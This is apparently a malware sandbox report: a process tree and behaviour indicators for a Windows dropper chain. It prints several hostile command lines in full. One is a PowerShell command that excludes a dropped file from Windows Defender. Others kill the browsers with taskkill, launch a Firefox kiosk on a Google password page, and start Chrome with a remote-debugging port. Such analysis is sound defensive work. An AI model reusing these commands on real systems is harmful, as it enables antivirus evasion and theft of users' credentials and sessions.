pid Process 2912 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 2912 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 4944 rapes.exe 4944 rapes.exe 316 36430e85bc.exe 316 36430e85bc.exe 4796 fd3d5b1ed1.exe 4796 fd3d5b1ed1.exe 4796 fd3d5b1ed1.exe 4796 fd3d5b1ed1.exe 3444 dfe8f775d3.exe 3444 dfe8f775d3.exe 2764 e11988fb68.exe 2764 e11988fb68.exe 2764 e11988fb68.exe 2764 e11988fb68.exe 2764 e11988fb68.exe 2764 e11988fb68.exe 2864 770fd64b77.exe 2864 770fd64b77.exe 4808 fa9cd2f57c.exe 4808 fa9cd2f57c.exe 2864 770fd64b77.exe 2864 770fd64b77.exe 2864 770fd64b77.exe 2864 770fd64b77.exe 4472 2085eb7ce3.exe 4472 2085eb7ce3.exe 4808 fa9cd2f57c.exe 4808 fa9cd2f57c.exe 4808 fa9cd2f57c.exe 4808 fa9cd2f57c.exe 4272 rapes.exe 4272 rapes.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 4116 LAHU5YGKPHULSVA2AGH.exe 4116 LAHU5YGKPHULSVA2AGH.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 5756 15ad30e5a6.exe 5756 15ad30e5a6.exe 5756 15ad30e5a6.exe 5756 15ad30e5a6.exe 5756 15ad30e5a6.exe 5272 ce4pMzk.exe 5272 ce4pMzk.exe 5272 ce4pMzk.exe 5272 ce4pMzk.exe 5272 ce4pMzk.exe 3340 powershell.exe 3340 powershell.exe 3340 powershell.exe 1208 FvbuInU.exe 1208 FvbuInU.exe 2332 mAtJWNv.exe 2332 mAtJWNv.exe 1208 FvbuInU.exe 1208 FvbuInU.exe 1208 FvbuInU.exe 1208 FvbuInU.exe 2332 mAtJWNv.exe 2332 mAtJWNv.exe 5596 chrome.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 6124 SplashWin.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 6376 msedge.exe 6376 msedge.exe 6376 msedge.exe 6376 msedge.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeDebugPrivilege 4808 fd3d5b1ed1.exe Token: SeDebugPrivilege 5108 taskkill.exe Token: SeDebugPrivilege 4968 taskkill.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeDebugPrivilege 1444 taskkill.exe Token: SeDebugPrivilege 2764 taskkill.exe Token: SeDebugPrivilege 2492 firefox.exe Token: SeDebugPrivilege 2492 firefox.exe Token: SeDebugPrivilege 5756 15ad30e5a6.exe Token: SeDebugPrivilege 5272 ce4pMzk.exe Token: SeDebugPrivilege 5552 chromium.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeShutdownPrivilege 5596 chrome.exe Token: SeCreatePagefilePrivilege 5596 chrome.exe Token: SeShutdownPrivilege 5596 chrome.exe Token: SeCreatePagefilePrivilege 5596 chrome.exe Token: SeShutdownPrivilege 5596 chrome.exe Token: SeCreatePagefilePrivilege 5596 chrome.exe Token: SeShutdownPrivilege 5596 chrome.exe Token: SeCreatePagefilePrivilege 5596 chrome.exe Token: SeShutdownPrivilege 5596 chrome.exe Token: SeCreatePagefilePrivilege 5596 chrome.exe Token: SeShutdownPrivilege 5596 chrome.exe Token: SeCreatePagefilePrivilege 5596 chrome.exe Token: SeShutdownPrivilege 5596 chrome.exe Token: SeCreatePagefilePrivilege 5596 chrome.exe Token: SeDebugPrivilege 6868 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2912 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 5596 chrome.exe 6376 msedge.exe 6376 msedge.exe 6376 msedge.exe 6376 msedge.exe 6376 msedge.exe -
Suspicious use of SendNotifyMessage 31 IoCs
pid Process 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2492 firefox.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe 2216 90063aaeb3.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2492 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2912 wrote to memory of 4944 2912 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 87 PID 2912 wrote to memory of 4944 2912 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 87 PID 2912 wrote to memory of 4944 2912 daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe 87 PID 4944 wrote to memory of 316 4944 rapes.exe 95 PID 4944 wrote to memory of 316 4944 rapes.exe 95 PID 4944 wrote to memory of 316 4944 rapes.exe 95 PID 4944 wrote to memory of 4808 4944 rapes.exe 96 PID 4944 wrote to memory of 4808 4944 rapes.exe 96 PID 4944 wrote to memory of 4808 4944 rapes.exe 96 PID 4808 wrote to memory of 4796 4808 fd3d5b1ed1.exe 97 PID 4808 wrote to memory of 4796 4808 fd3d5b1ed1.exe 97 PID 4808 wrote to memory of 4796 4808 fd3d5b1ed1.exe 97 PID 4808 wrote to memory of 4796 4808 fd3d5b1ed1.exe 97 PID 4808 wrote to memory of 4796 4808 fd3d5b1ed1.exe 97 PID 4808 wrote to memory of 4796 4808 fd3d5b1ed1.exe 97 PID 4808 wrote to memory of 4796 4808 fd3d5b1ed1.exe 97 PID 4808 wrote to memory of 4796 4808 fd3d5b1ed1.exe 97 PID 4808 wrote to memory of 4796 4808 fd3d5b1ed1.exe 97 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 316 wrote to memory of 4296 316 36430e85bc.exe 101 PID 4944 wrote to memory of 3444 4944 rapes.exe 102 PID 4944 wrote to memory of 3444 4944 rapes.exe 102 PID 4944 wrote to memory of 3444 4944 rapes.exe 102 PID 4944 wrote to memory of 2764 4944 rapes.exe 104 PID 4944 wrote to memory of 2764 4944 rapes.exe 104 PID 4944 wrote to memory of 2764 4944 rapes.exe 104 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 3444 wrote to memory of 1840 3444 dfe8f775d3.exe 109 PID 4944 wrote to memory of 2864 4944 rapes.exe 115 PID 4944 wrote to memory of 2864 4944 rapes.exe 115 PID 4944 wrote to memory of 2864 4944 rapes.exe 115 PID 4944 wrote to memory of 4808 4944 rapes.exe 116 PID 4944 wrote to memory of 4808 4944 rapes.exe 116 PID 4944 wrote to memory of 4808 4944 rapes.exe 116 PID 4944 wrote to memory of 4472 4944 rapes.exe 118 PID 4944 wrote to memory of 4472 4944 rapes.exe 118 PID 4944 wrote to memory of 4472 4944 rapes.exe 118 PID 4944 wrote to memory of 2216 4944 rapes.exe 120 PID 4944 wrote to memory of 2216 4944 rapes.exe 120 PID 4944 wrote to memory of 2216 4944 rapes.exe 120 PID 2216 wrote to memory of 5108 2216 90063aaeb3.exe 121 PID 2216 wrote to memory of 5108 2216 90063aaeb3.exe 121 PID 2216 wrote to memory of 5108 2216 90063aaeb3.exe 121 PID 2216 wrote to memory of 4968 2216 90063aaeb3.exe 123 PID 2216 wrote to memory of 4968 2216 90063aaeb3.exe 123 PID 2216 wrote to memory of 4968 2216 90063aaeb3.exe 123 PID 2216 wrote to memory of 1760 2216 90063aaeb3.exe 125 PID 2216 wrote to memory of 1760 2216 90063aaeb3.exe 125 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe"C:\Users\Admin\AppData\Local\Temp\daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Users\Admin\AppData\Local\Temp\10105330101\36430e85bc.exe"C:\Users\Admin\AppData\Local\Temp\10105330101\36430e85bc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4296
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105340101\fd3d5b1ed1.exe"C:\Users\Admin\AppData\Local\Temp\10105340101\fd3d5b1ed1.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4808 -
C:\Users\Admin\AppData\Local\Temp\10105340101\fd3d5b1ed1.exe"C:\Users\Admin\AppData\Local\Temp\10105340101\fd3d5b1ed1.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 7964⤵
- Program crash
PID:4488
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105350101\dfe8f775d3.exe"C:\Users\Admin\AppData\Local\Temp\10105350101\dfe8f775d3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:1840
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105360101\e11988fb68.exe"C:\Users\Admin\AppData\Local\Temp\10105360101\e11988fb68.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2764
-
-
C:\Users\Admin\AppData\Local\Temp\10105370101\770fd64b77.exe"C:\Users\Admin\AppData\Local\Temp\10105370101\770fd64b77.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2864
-
-
C:\Users\Admin\AppData\Local\Temp\10105380101\fa9cd2f57c.exe"C:\Users\Admin\AppData\Local\Temp\10105380101\fa9cd2f57c.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4808 -
C:\Users\Admin\AppData\Local\Temp\LAHU5YGKPHULSVA2AGH.exe"C:\Users\Admin\AppData\Local\Temp\LAHU5YGKPHULSVA2AGH.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4116
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105390101\2085eb7ce3.exe"C:\Users\Admin\AppData\Local\Temp\10105390101\2085eb7ce3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4472
-
-
C:\Users\Admin\AppData\Local\Temp\10105400101\90063aaeb3.exe"C:\Users\Admin\AppData\Local\Temp\10105400101\90063aaeb3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1760
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:3296
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2492 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {22cd45ce-fda0-4877-90ed-8116679c1e69} 2492 "\\.\pipe\gecko-crash-server-pipe.2492" gpu6⤵PID:2248
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2332 -prefMapHandle 2296 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fb1a66e-55ca-4eec-8343-331dd61cd645} 2492 "\\.\pipe\gecko-crash-server-pipe.2492" socket6⤵PID:2972
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3136 -childID 1 -isForBrowser -prefsHandle 3148 -prefMapHandle 3112 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1a8e27f-a183-45d1-8ea6-e8e7334b362e} 2492 "\\.\pipe\gecko-crash-server-pipe.2492" tab6⤵PID:4968
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3856 -childID 2 -isForBrowser -prefsHandle 3880 -prefMapHandle 3876 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad6a3114-0eea-46b5-8c64-7f913ab84f65} 2492 "\\.\pipe\gecko-crash-server-pipe.2492" tab6⤵PID:2064
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4556 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4540 -prefMapHandle 4532 -prefsLen 32766 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c213b52c-49e3-4734-9b02-7472bfb75bc0} 2492 "\\.\pipe\gecko-crash-server-pipe.2492" utility6⤵
- Checks processor information in registry
PID:5696
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5360 -prefMapHandle 5364 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f8cc563-3b53-4b2a-b28d-b9fe25f4d51a} 2492 "\\.\pipe\gecko-crash-server-pipe.2492" tab6⤵PID:5164
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5624 -childID 4 -isForBrowser -prefsHandle 5616 -prefMapHandle 5604 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {beec06e3-0ac6-416b-93d7-a8f1a4344235} 2492 "\\.\pipe\gecko-crash-server-pipe.2492" tab6⤵PID:5476
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5772 -prefMapHandle 5776 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {323cfcf9-d2ff-4409-a7bd-6577e3f1db06} 2492 "\\.\pipe\gecko-crash-server-pipe.2492" tab6⤵PID:5456
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105410101\15ad30e5a6.exe"C:\Users\Admin\AppData\Local\Temp\10105410101\15ad30e5a6.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5756
-
-
C:\Users\Admin\AppData\Local\Temp\10105420101\ce4pMzk.exe"C:\Users\Admin\AppData\Local\Temp\10105420101\ce4pMzk.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\7IVC84L3\Anubis.exe""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
-
C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5660 -
C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"4⤵
- Executes dropped EXE
PID:4116
-
-
C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"4⤵
- Executes dropped EXE
PID:5752
-
-
C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2332 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5596 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe2dfbcc40,0x7ffe2dfbcc4c,0x7ffe2dfbcc586⤵PID:1272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,2619270769712128854,14259601429685600001,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:26⤵PID:1572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,2619270769712128854,14259601429685600001,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2180 /prefetch:36⤵PID:768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,2619270769712128854,14259601429685600001,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2568 /prefetch:86⤵PID:1088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,2619270769712128854,14259601429685600001,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3112 /prefetch:16⤵
- Uses browser remote debugging
PID:4896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,2619270769712128854,14259601429685600001,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3204 /prefetch:16⤵
- Uses browser remote debugging
PID:5580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4448,i,2619270769712128854,14259601429685600001,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4536 /prefetch:16⤵
- Uses browser remote debugging
PID:6056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4624,i,2619270769712128854,14259601429685600001,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:86⤵PID:6092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4548,i,2619270769712128854,14259601429685600001,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4776 /prefetch:86⤵PID:4376
-
-
